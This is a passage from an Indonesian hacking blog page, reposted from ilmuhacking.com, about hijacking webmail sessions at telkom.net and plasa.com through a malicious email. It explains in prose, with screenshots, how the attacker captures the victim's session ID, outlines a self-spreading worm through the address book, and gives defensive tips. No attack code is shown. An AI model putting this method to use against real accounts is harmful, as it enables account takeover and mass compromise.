<div id="attachment_1331" class="wp-caption aligncenter" style="width: 310px;"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emailattackertiba.png"><img src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emailattackertiba-300x97.png" alt="email attacker tiba" title="emailattackertiba" class="size-medium wp-image-1331" width="300" height="97"></a><p class="wp-caption-text">email attacker tiba</p></div>
<p align="justify">Dan gambar berikut adalah gambar ketika email
attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa
session id korban dan pesan bahwa signature korban berubah tertulis
dalam file image.jpg.
</p>
<div id="attachment_1334" class="wp-caption aligncenter" style="width: 310px;"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emaildibuka.png"><img src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/emaildibuka-300x186.png" alt="victim open email and his session hijacked instantly" title="emaildibuka" class="size-medium wp-image-1334" width="300" height="186"></a><p class="wp-caption-text">victim open email and his session hijacked instantly</p></div>
<p align="justify">Pada saat korban membuka email dari attacker, pada
saat itu juga attacker menguasai penuh account email korban. Dalam
contoh artikel ini attacker mengubah signature korban dengan
menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah
gambar signature korban setelah korban membuka email attacker.
</p>
<p><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature2.png"><img src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature2-300x135.png" alt="signature2" title="signature2" class="aligncenter size-medium wp-image-1341" width="300" height="135"></a></p>
<p align="justify">
<b>Worm Attack: More Dangerous Scenario</b>
</p>
<p align="justify">Skenario serangan yang lebih berbahaya adalah bila
attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat
bahwa ketika attacker mendapatkan session ID, pada saat itu attacker
memiliki power yang setara dengan korban. Dengan session korban,
attacker bisa mengirimkan email serangan yang sama ke calon korban lain
yang ada di dalam daftar buku alamat korban. Begitu teman korban
membuka email itu, maka session dia juga dalam genggaman attacker dan
dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan
memicu reaksi berantai yang berbahaya.
</p>
<p align="justify">Sulitkah membuat worm seperti itu? Tidak sulit kok,
mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST
dengan berbekal session ID korban. Attacker harus membaca phone book
dengan mengirim request HTTP (GET/POST) dengan session ID korban.
Setelah itu attacker akan mengirimkan email serangan ke teman-teman
korban juga dengan melakukan request HTTP dengan session ID korban.
Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah
sering memprogram.
</p>
<p align="justify">
<b>Tips Menghindari Serangan</b>
</p>
<p align="justify">Karena serangan ini dilakukan dengan membajak
session web, maka serangan ini hanya bisa dilakukan bila korban membaca
email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari
serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email.
Dengan menggunakan email client non-web seperti Thunderbird dan Outlook
anda akan aman dari serangan ini.</p><p align="justify"><br></p><p align="justify">sumber : ilmuhacking.com<br></p>
		<script>
			var container = document.getElementById('nativeroll_video_cont');

			if (container) {
				var parent = container.parentElement;

				if (parent) {
					const wrapper = document.createElement('div');
					wrapper.classList.add('js-teasers-wrapper');

					parent.insertBefore(wrapper, container.nextSibling);
				}
			}
		</script>
	 </td></tr>
<tr><td colspan="2" class="eDetails">
<div style="float:right">
			<style type="text/css">
				.u-star-rating-12 { list-style:none; margin:0px; padding:0px; width:60px; height:12px; position:relative; background: url('/.s/img/stars/3/12.png') top left repeat-x }
				.u-star-rating-12 li{ padding:0px; margin:0px; float:left }
				.u-star-rating-12 li a { display:block;width:12px;height: 12px;line-height:12px;text-decoration:none;text-indent:-9000px;z-index:20;position:absolute;padding: 0px;overflow:hidden }
				.u-star-rating-12 li a:hover { background: url('/.s/img/stars/3/12.png') left center;z-index:2;left:0px;border:none }
				.u-star-rating-12 a.u-one-star { left:0px }
				.u-star-rating-12 a.u-one-star:hover { width:12px }
				.u-star-rating-12 a.u-two-stars { left:12px }
				.u-star-rating-12 a.u-two-stars:hover { width:24px }
				.u-star-rating-12 a.u-three-stars { left:24px }
				.u-star-rating-12 a.u-three-stars:hover { width:36px }
				.u-star-rating-12 a.u-four-stars { left:36px }
				.u-star-rating-12 a.u-four-stars:hover { width:48px }
				.u-star-rating-12 a.u-five-stars { left:48px }
				.u-star-rating-12 a.u-five-stars:hover { width:60px }
				.u-star-rating-12 li.u-current-rating { top:0 !important; left:0 !important;margin:0 !important;padding:0 !important;outline:none;background: url('/.s/img/stars/3/12.png') left bottom;position: absolute;height:12px !important;line-height:12px !important;display:block;text-indent:-9000px;z-index:1 }
			</style><script>
				var usrarids = {};
				function ustarrating(id, mark) {
					if (!usrarids[id]) {
						usrarids[id] = 1;
						$(".u-star-li-"+id).hide();
						_uPostForm('', {type:'POST', url:'/news/', data:{
							'a':'65',
							'id':id,
							'mark':mark,
							'mod':'news',
							'ajax':'2'
						}});
					}
				}
			</script><ul id="uStarRating41" class="uStarRating41 u-star-rating-12" title="Rating: 0.0/0">
			<li id="uCurStarRating41" class="u-current-rating uCurStarRating41" style="width:0%;"></li><li class="u-star-li-41"><a href="#" onclick="ustarrating('41', 1); return false;" class="u-one-star">1</a></li>
				<li class="u-star-li-41"><a href="#" onclick="ustarrating('41', 2); return false;" class="u-two-stars">2</a></li>
				<li class="u-star-li-41"><a href="#" onclick="ustarrating('41', 3); return false;" class="u-three-stars">3</a></li>
				<li class="u-star-li-41"><a href="#" onclick="ustarrating('41', 4); return false;" class="u-four-stars">4</a></li>
				<li class="u-star-li-41"><a href="#" onclick="ustarrating('41', 5); return false;" class="u-five-stars">5</a></li></ul></div>
<!--<s3179>-->Category<!--</s>-->: <a href="/news/hacking/1-0-9">Hacking</a> |
<!--<s3177>-->Views<!--</s>-->: 2259 |
<!--<s3178>-->Added by<!--</s>-->: <a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-1', 'up1', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">PakRud</a>
 | <!--<s5308>-->Tags<!--</s>-->: <noindex><a href="/search/interner/" rel="nofollow" class="eTag">interner</a>, <a href="/search/mail/" rel="nofollow" class="eTag">mail</a>, <a href="/search/Hacking/" rel="nofollow" class="eTag">Hacking</a></noindex>
| <!--<s3119>-->Rating<!--</s>-->: <span id="entRating41">0.0</span>/<span id="entRated41">0</span></td></tr>
</table>



<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr><td width="60%" height="25"><!--<s5183>-->Total comments<!--</s>-->: <b>1</b></td><td align="right" height="25"></td></tr>
<tr><td colspan="2">
			<div class="com-order-block">
				<label class="com-order-wrap">
					<span class="com-order-title">Comments display order:</span>
					<select class="com-order-select">
						<option value="" selected="selected">By default</option>
						<option value="desc" >New comments first</option>
						<option value="asc" >Old comments first</option>
					</select>
				</label>
			</div>
			<script>
				setTimeout(function() {
					$('.com-order-select').change(function() {
						var elem = $(this);
						var oldValue = ( /drudianwarcomOrder=(asc|desc)/.exec(document.cookie) || {} )[1] || '';
						var newValue = elem.val();
						console.log(oldValue, newValue);
						if (newValue == oldValue) {
							return;
						}
						document.cookie = 'drudianwarcomOrder=' + encodeURIComponent(newValue) + '; path=/; expires=' + (new Date((new Date).getTime() + 1000*60*60*24*365)).toGMTString();
						window.console && console.info && console.info('comment order changed: "' + oldValue + '" >> "' + newValue + '"');
						// elem.parents('.com-order-wrap').eq(0).find('.com-order-apply').fadeIn().removeClass('com-order-apply-hidden').addClass('com-order-apply-visible');
						newValue = newValue || 'default';
						location.search = location.search
							? /[?&]comments_order=([^&]*)/.test(location.search)
								? location.search.replace(/comments_order=([^&]*)/, 'comments_order=' + newValue)
								: location.search + '&comments_order=' + newValue
							: '?comments_order=' + newValue;
					});
				}, 100);
			</script>
		<script>
				function spages(p, link) {
					!!link && location.assign(atob(link));
				}
			</script>
			<div id="comments"></div>
			<div id="newEntryT"></div>
			<div id="allEntries"><div class="comEnt report-spam-target " id="comEnt206" style=" "><table border="0" cellpadding="0" cellspacing="0" width="100%" class="cBlock1">
<tr><td style="padding:3px;">
	<script type="application/ld+json">
					{	"@context": "https://schema.org",
						"@type": "Review",
						"itemReviewed": {
							"@context": "https://schema.org",
							"@type": "MediaObject",
							"name": "Hacking Email Telkom.net dan Plasa.com"
						},
						"name": "Hacking Email Telkom.net dan Plasa.com",
						"author": {
							"@type": "Person",
							"name": "anorexia nervosa articles"
						}
					}
					</script>
	<div class="flex-justify-between">
		<div class="cTop" >
			
				
			

			<a href="#ent206" onclick="if (window['comEnt206']) { window['comEnt206'].scrollIntoView({ block:'center', behavior:'smooth' }); return false; }" name="ent206"><b>1</b></a>
			
			<span><b>anorexia nervosa articles</b></span>
			
			 
			<span itemprop="datePublished" content="11 Jun 2012 8:59 PM" style="font-size:7pt;unicode-bidi:embed;">(11 Jun 2012 8:59 PM)</span>
			
		</div>
		<div style="font-size:11px;">
			
				<img alt="" src="/.s/img/icon/thumbu2_.png" title="Good post" style="margin: 0 4px;opacity: .5;">
				<span>
					<span class="u-rate-wrapper">0</span>
				</span>
				<img alt="" src="/.s/img/icon/thumbd2_.png" title="Bad post" style="margin: 0 4px;opacity: .5;">
			
			
		</div>
	</div>
	<div itemprop="reviewBody" class="cMessage" style="clear:both;padding:2px 0;">
		
		I am pleased to read rudianwar.ucoz.com ! <br /> <br /> [url=http://treatmentanorexianervosa.blogspot.com]anorexia nervosa causes <br /> [/url]
	</div>
	
	
</td></tr></table><br />

</div><div style="width:auto;*width:100%;margin-left:20px;" id="appEntry206"><b></b></div></div>
			<div id="newEntryB"></div></td></tr>
<tr><td colspan="2" align="center"></td></tr>
<tr><td colspan="2" height="10"></td></tr>
</table>



<div align="center" class="commReg"><!--<s5237>-->Only registered users can add comments.<!--</s>--><br />[ <a href="/register"><!--<s3089>-->Registration<!--</s>--></a> | <a href="javascript:;" rel="nofollow" onclick="loginPopupForm(); return false;"><!--<s3087>-->Login<!--</s>--></a> ]</div>

<!-- </body> --></td><td style="background:url('/.s/t/996/19.gif');"></td></tr>
<tr><td width="34" height="34"><img src="/.s/t/996/20.gif" border="0"></td><td style="background:url('/.s/t/996/21.gif');"></td><td width="34" height="34"><img src="/.s/t/996/22.gif" border="0"></td></tr>
</table>
</td>

<td valign="top" style="width:216px;">

<!--U1DRIGHTER1Z--><!-- <block7> -->

<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> --><!--<s3163>-->Search<!--</s>--><!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><div align="center"><!-- <bc> -->
		<div class="searchForm">
			<form onsubmit="this.sfSbm.disabled=true" method="get" style="margin:0" action="/search/">
				<div align="center" class="schQuery">
					<input type="text" name="q" maxlength="30" size="20" class="queryField" />
				</div>
				<div align="center" class="schBtn">
					<input type="submit" class="searchSbmFl" name="sfSbm" value="Search" />
				</div>
				<input type="hidden" name="t" value="0">
			</form>
		</div><!-- </bc> --></div></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>

<!-- </block7> -->

<!-- <block23> -->
<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> -->Banner<!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><!-- <bc> --><!-- TopSeratus Button Link BEGIN -->
<a target="_blank" href="http://www.topseratus.com/"><img src="http://www.topseratus.com/images/button.png" alt="100 Blog Indonesia Terbaik" border="0" /></a>
<!-- TopSeratus Button Link End -->
<br><br>
<a href="http://www.4shared.com/ref/16172545/3"><img src="http://www.4shared.com/affiliate/images/b2.gif" alt="Join 4Shared Now!"/></a>
<br><br>
<a href='http://www.ziddu.com/register.php?referralid=(yzWk0GI(}' target="_blank"><img border=0 src="http://www.ziddu.com/banners/images/120x60.gif"/></a>
<br><br>
<a href="http://www.co.cc/?id=180167" target="_blank"><img src="http://get-banner.lookup.co.cc/banner_img/cocc90_40g.gif" border="0" alt="CO.CC:Free Domain" /></a><!-- </bc> --></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>
<!-- </block23> -->

<!-- <block10> -->
<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> -->Terjemah Al Qur'an<!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><!-- <bc> --><iframe src="http://www.readthequran.org/gadget/read/ENGLISH1/QURAN/001.html?url=http%3A%2F%2Fwww.readthequran.org%2Fgooglegadget%2FReadTheQuran.xml" width="165" height="200" scrolling="yes" allowTransparency="true" frameborder="0" style="background-color:white;"></iframe><!-- </bc> --></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>
<!-- </block10> -->

<!-- <block5> -->

<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> -->Tags Cloud<!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><!-- <bc> --><noindex><a style="font-size:8pt;" href="/search/anti%20virus/" rel="nofollow" class="eTag eTagGr8">anti virus</a> <a style="font-size:21pt;" href="/search/fisika/" rel="nofollow" class="eTag eTagGr21">fisika</a> <a style="font-size:8pt;" href="/search/Guru/" rel="nofollow" class="eTag eTagGr8">Guru</a> <a style="font-size:8pt;" href="/search/pemrograman/" rel="nofollow" class="eTag eTagGr8">pemrograman</a> <a style="font-size:8pt;" href="/search/visual%20basic/" rel="nofollow" class="eTag eTagGr8">visual basic</a> <a style="font-size:10pt;" href="/search/design/" rel="nofollow" class="eTag eTagGr10">design</a> <a style="font-size:10pt;" href="/search/pascal/" rel="nofollow" class="eTag eTagGr10">pascal</a> <a style="font-size:8pt;" href="/search/Tugas/" rel="nofollow" class="eTag eTagGr8">Tugas</a> <a style="font-size:14pt;" href="/search/office/" rel="nofollow" class="eTag eTagGr14">office</a> <a style="font-size:10pt;" href="/search/Ms.%20Word/" rel="nofollow" class="eTag eTagGr10">Ms. Word</a> <a style="font-size:19pt;" href="/search/biografi/" rel="nofollow" class="eTag eTagGr19">biografi</a> <a style="font-size:17pt;" href="/search/islam/" rel="nofollow" class="eTag eTagGr17">islam</a> <a style="font-size:12pt;" href="/search/Agama/" rel="nofollow" class="eTag eTagGr12">Agama</a> <a style="font-size:8pt;" href="/search/photoshop/" rel="nofollow" class="eTag eTagGr8">photoshop</a> <a style="font-size:25pt;" href="/search/Upgrade%20Knowledge/" rel="nofollow" class="eTag eTagGr25">Upgrade Knowledge</a> <a style="font-size:12pt;" href="/search/internet/" rel="nofollow" class="eTag eTagGr12">internet</a> <a style="font-size:10pt;" href="/search/Komputer/" rel="nofollow" class="eTag eTagGr10">Komputer</a> <a style="font-size:8pt;" href="/search/Blog/" rel="nofollow" class="eTag eTagGr8">Blog</a> <a style="font-size:14pt;" href="/search/Hacking/" rel="nofollow" class="eTag eTagGr14">Hacking</a> <a style="font-size:8pt;" href="/search/interner/" rel="nofollow" class="eTag eTagGr8">interner</a> <a style="font-size:8pt;" href="/search/mail/" rel="nofollow" class="eTag eTagGr8">mail</a> <a style="font-size:10pt;" href="/search/ponsel/" rel="nofollow" class="eTag eTagGr10">ponsel</a> <a style="font-size:8pt;" href="/search/Amazing/" rel="nofollow" class="eTag eTagGr8">Amazing</a> <a style="font-size:8pt;" href="/search/Ninja/" rel="nofollow" class="eTag eTagGr8">Ninja</a> <a style="font-size:17pt;" href="/search/Hikmah/" rel="nofollow" class="eTag eTagGr17">Hikmah</a> <a style="font-size:16pt;" href="/search/motivasi/" rel="nofollow" class="eTag eTagGr16">motivasi</a> <a style="font-size:8pt;" href="/search/Password/" rel="nofollow" class="eTag eTagGr8">Password</a> <a style="font-size:10pt;" href="/search/networking/" rel="nofollow" class="eTag eTagGr10">networking</a> <a style="font-size:8pt;" href="/search/jaringan/" rel="nofollow" class="eTag eTagGr8">jaringan</a> <a style="font-size:8pt;" href="/search/fiber/" rel="nofollow" class="eTag eTagGr8">fiber</a> <a style="font-size:8pt;" href="/search/Sistem%20Operasi/" rel="nofollow" class="eTag eTagGr8">Sistem Operasi</a> <a style="font-size:8pt;" href="/search/Windows/" rel="nofollow" class="eTag eTagGr8">Windows</a> <a style="font-size:8pt;" href="/search/programming/" rel="nofollow" class="eTag eTagGr8">programming</a> <a style="font-size:8pt;" href="/search/Visual%20studio/" rel="nofollow" class="eTag eTagGr8">Visual studio</a> <a style="font-size:8pt;" href="/search/Office%20mobile%202010/" rel="nofollow" class="eTag eTagGr8">Office mobile 2010</a> <a style="font-size:8pt;" href="/search/hack%20yahoo/" rel="nofollow" class="eTag eTagGr8">hack yahoo</a> <a style="font-size:8pt;" href="/search/Presiden/" rel="nofollow" class="eTag eTagGr8">Presiden</a> </noindex><!-- </bc> --></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>

<!-- </block5> -->

<!-- <block8> -->

<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> --><!--<s5171>-->Calendar<!--</s>--><!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><div align="center"><!-- <bc> --><table border="0" cellspacing="1" cellpadding="2" class="calTable"><tr><td align="center" class="calMonth" colspan="7"><a title="October 2009" class="calMonthLink" rel="nofollow" href="/news/2009-10">«</a>  <a class="calMonthLink" rel="nofollow" href="/news/2009-11">November 2009</a>  <a title="December 2009" class="calMonthLink" rel="nofollow" href="/news/2009-12">»</a></td></tr><tr><td align="center" class="calWdaySu">Su</td><td align="center" class="calWday">Mo</td><td align="center" class="calWday">Tu</td><td align="center" class="calWday">We</td><td align="center" class="calWday">Th</td><td align="center" class="calWday">Fr</td><td align="center" class="calWdaySe">Sa</td></tr><tr><td align="center" class="calMday">1</td><td align="center" class="calMday">2</td><td align="center" class="calMday">3</td><td align="center" class="calMday">4</td><td align="center" class="calMday">5</td><td align="center" class="calMday">6</td><td align="center" class="calMday">7</td></tr><tr><td align="center" class="calMday">8</td><td align="center" class="calMday">9</td><td align="center" class="calMdayIs"><a class="calMdayLink" href="/news/2009-11-10" title="13 Messages">10</a></td><td align="center" class="calMdayIsA"><a class="calMdayLink" href="/news/2009-11-11" title="23 Messages">11</a></td><td align="center" class="calMdayIs"><a class="calMdayLink" href="/news/2009-11-12" title="1 Messages">12</a></td><td align="center" class="calMday">13</td><td align="center" class="calMdayIs"><a class="calMdayLink" href="/news/2009-11-14" title="5 Messages">14</a></td></tr><tr><td align="center" class="calMdayIs"><a class="calMdayLink" href="/news/2009-11-15" title="1 Messages">15</a></td><td align="center" class="calMdayIs"><a class="calMdayLink" href="/news/2009-11-16" title="5 Messages">16</a></td><td align="center" class="calMdayIs"><a class="calMdayLink" href="/news/2009-11-17" title="1 Messages">17</a></td><td align="center" class="calMday">18</td><td align="center" class="calMday">19</td><td align="center" class="calMday">20</td><td align="center" class="calMdayIs"><a class="calMdayLink" href="/news/2009-11-21" title="1 Messages">21</a></td></tr><tr><td align="center" class="calMday">22</td><td align="center" class="calMday">23</td><td align="center" class="calMday">24</td><td align="center" class="calMday">25</td><td align="center" class="calMday">26</td><td align="center" class="calMday">27</td><td align="center" class="calMday">28</td></tr><tr><td align="center" class="calMday">29</td><td align="center" class="calMday">30</td></tr></table><!-- </bc> --></div></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>

<!-- </block8> -->

<!-- <block11> -->
<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> -->Popular Sites<!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><!-- <bc> -->
<li><a href="http://www.insankamil.org/" target="_blank" class="noun">Insan Kamil Forum</a></li><!--</s>-->
<li><a href="http://www.sma3bogor.co.cc/" target="_blank" class="noun">SMA 3 Bogor Forum</a></li><!--</s>-->
<li><a href="http://www.pulsaberkah.co.cc/" target="_blank" class="noun">Pulsa Berkah</a></li><!--</s>-->
<li><a href="http://www.ziddu.com/" target="_blank" class="noun">Ziddu</a></li><!--</s>-->
<li><a href="http://www.indowebster.web.id/" target="_blank" class="noun">IDWS Forum</a></li><!--</s>-->
<li><a href="http://www.eksplorasi-dunia.blogspot.com/" target="_blank" class="noun">Eksplorasi Dunia</a></li><!--</s>-->
<li><a href="http://www.mtsrw.com/" target="_blank" class="noun">MTSRW Sites</a></li><!--</s>--><!-- </bc> --></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>
<!-- </block11> -->

<!-- <block13> -->
<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> -->Site Friends<!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><!-- <bc> -->
<li><a href="//www.irmasuryani.ucoz.com/" target="_blank" class="noun">Irma's Site</a></li><!--</s>-->
<li><a href="http://www.mad4jihad.moy.su/" target="_blank" class="noun">Mad4Jihad</a></li><!--</s>-->
<li><a href="http://www.mastulus.do.am/" target="_blank" class="noun">Mas Tulus</a></li><!--</s>-->
<li><a href="http://www.divansemesta.blogspot.com/" target="_blank" class="noun">Divan Semesta</a></li><!--</s>-->
<li><a href="//www.yuliannisa.ucoz.net/" target="_blank" class="noun">Yuli Annisa</a></li><!--</s>-->
<li><a href="//www.fahlefi.ucoz.com/" target="_blank" class="noun">Fahlefi</a></li><!--</s>-->
<li><a href="//www.bangidris.ucoz.com/" target="_blank" class="noun">Bang Idris</a></li><!--</s>-->
<li><a href="//www.aheed.ucoz.com/" target="_blank" class="noun">Bang Acil</a></li><!--</s>-->
<li><a href="//www.m31.ucoz.com/" target="_blank" class="noun">m31 community</a></li><!--</s>-->
<li><a href="//www.mrbrain.ucoz.com/" target="_blank" class="noun">Mr. Brain</a></li><!--</s>-->
<li><a href="//www.alrom.ucoz.com/" target="_blank" class="noun">@lrom's site</a></li><!--</s>--><!-- </bc> --></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>
<!-- </block13> -->

<!-- <block6> -->
<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> -->Counter Site<!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><!-- <bc> --><script src="/widget/?8;2009|11|10|Web%20ini%20telah%20eksis%20selama%20%3Cb%3E%25N%25%3C%2Fb%3E%20hari"></script><!-- </bc> --></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>
<!-- </block6> -->

<!-- <block12> -->

<table border="0" cellpadding="0" cellspacing="0" width="216">
<tr><td height="36" colspan="3" style="background:url('/.s/t/996/8.gif');padding-left:20px;color:#ACC5FF;"><b><!-- <bt> --><!--<s5195>-->Statistics<!--</s>--><!-- </bt> --></b></td></tr>
<tr><td width="26" valign="top" style="background:url('/.s/t/996/9.gif');"><img src="/.s/t/996/10.gif" border="0"></td><td width="175" style="background:url('/.s/t/996/11.gif');padding:5px;"><div align="center"><!-- <bc> --><hr /><div class="tOnline" id="onl1">Total online: <b>1</b></div> <div class="gOnline" id="onl2">Guests: <b>1</b></div> <div class="uOnline" id="onl3">Users: <b>0</b></div><!-- </bc> --></div></td><td width="15" valign="top" style="background:url('/.s/t/996/12.gif');"><img src="/.s/t/996/13.gif" border="0"></td></tr>
<tr><td colspan="3"><img src="/.s/t/996/14.gif" border="0"></td></tr>
</table>

<!-- </block12> -->

<!-- <block16> -->
<!-- <gr16> --><!-- </gre> -->
<!-- </block16> --><!--/U1DRIGHTER1Z-->

</td>
</tr>
</table>
<!-- </middle> -->

<!--U1BFOOTER1Z--><table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr><td width="25" height="25"><img src="/.s/t/996/23.gif" border="0"></td><td colspan="2" style="background:url('/.s/t/996/24.gif');"></td><td width="25" height="25"><img src="/.s/t/996/25.gif" border="0"></td></tr>
<tr><td style="background:url('/.s/t/996/26.gif');"></td><td align="center" style="background:#000000;"><!-- <copy> -->Copyright rud1man © 2024<!-- </copy> --></td><td align="center" style="background:#000000;"><!-- "' --><span class="pbG9Fn3i"><a href="https://www.ucoz.com/"><img style="width:80px; height:15px;" src="/.s/img/cp/47.gif" alt="" /></a></span></td><td style="background:url('/.s/t/996/27.gif');"></td></tr>
<tr><td width="25" height="25"><img src="/.s/t/996/28.gif" border="0"></td><td colspan="2" style="background:url('/.s/t/996/29.gif');"></td><td width="25" height="25"><img src="/.s/t/996/30.gif" border="0"></td></tr>
<<script src="/widget/?"></script>('7','|1|10')>
</table><!--/U1BFOOTER1Z-->

</td><td width="25" height="100%" style="background:url('/.s/t/996/31.gif') top right repeat-y;" valign="top"><img src="/.s/t/996/31.gif" border="0"></td></tr>
</table>


</body>

</html>



<!-- 0.09102 (s36) -->